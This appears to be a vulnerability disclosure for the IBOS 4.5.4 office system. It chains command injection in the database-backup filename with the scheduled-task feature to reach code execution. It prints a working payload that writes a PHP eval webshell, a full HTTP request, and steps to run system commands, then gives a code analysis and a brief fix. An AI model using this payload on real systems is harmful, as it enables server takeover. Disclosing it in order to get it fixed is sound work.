Test environment

os : windows;
IBOS version : IBOS 4.5.4 OPEN

Vulnerability Test

Step-1(Use Command Injection Vulnerability)

use this vulnerability https://gitee.com/ibos/IBOS/issues/I18IIV to write a file on the specified directory.

first,login in to IBOS system and enter the management background.The operation is as follows like this.

Use burpsuite to grab packets and send them to "Repeater" for modification.Insert payload in parameter filename value.

Payload

the payload is like this.This payload will generate a file named "zzzzzz" in /system/modules/recruit/cron.

%26cd%20system%26cd%20modules%26cd%20recruit%26cd%20cron%26echo+eval($_GET["test"]);>>zzzzz%26aaa

Packet Data

and the packet is like this.

POST /?r=dashboard/database/backup HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/?r=dashboard/database/backup
Content-Type: application/x-www-form-urlencoded
Content-Length: 316
Connection: close
Cookie: P8Jm_saltkey=vpb6gmPE; PHPSESSID=3mcqdm2dr10tf3lb4cgpnl6ah5; P8Jm_sid=KmI412; P8Jm_autologin=1; P8Jm_lastactivity=1579248371; P8Jm_ulastactivity=480fKnWDRYWQhA5jDvpydR3bYm23jT9YOEmv%2FidCRP372M6FAptj
Upgrade-Insecure-Requests: 1

backuptype=custom&customtables%5B%5D=test_announcement&custom_enabled=1&method=shell&sizelimit=2048&extendins=0&sqlcompat=MYSQL41&sqlcharset=utf8&usehex=0&usezip=0&filename=2020-01-17_kRHRRgOk%26cd%20system%26cd%20modules%26cd%20recruit%26cd%20cron%26echo+eval($_GET["test"]);>>zzzzz%26aaa&dbSubmit=1

step-2(Modifying a scheduled task file)

enter scheduled task like this,and modify it.The file name was generate in "step-1",such as "zzzzzz".

in this function,modify the "Task script" like this and submit it.

step-3(Run Script)

Then you can run this script like this.

and use burpsuite function "Repeater" and add the parameter "test" like this,such as "phpinfo()".

run system command is like this,such as "ipconfig".

Code analysis

The problematic vulnerability is the file /system/modules/dashboard/controllers/CronController.php and the the function in question is actionIndex() in line 16.

look at line 40 getRealCronFile() function will form a complete file path.and the line 41 to line 47,this is the string used to filter filename that modify scheduled tasks.

getRealCronFile() function code.

In the above code, the save path and file name of the file are guaranteed, but the suffix of the file is not guaranteed, so you can write to arbitrary files to include getshell through other vulnerabilities.

Solution

Should contain a specific type of file in a specified directory, or a specified file.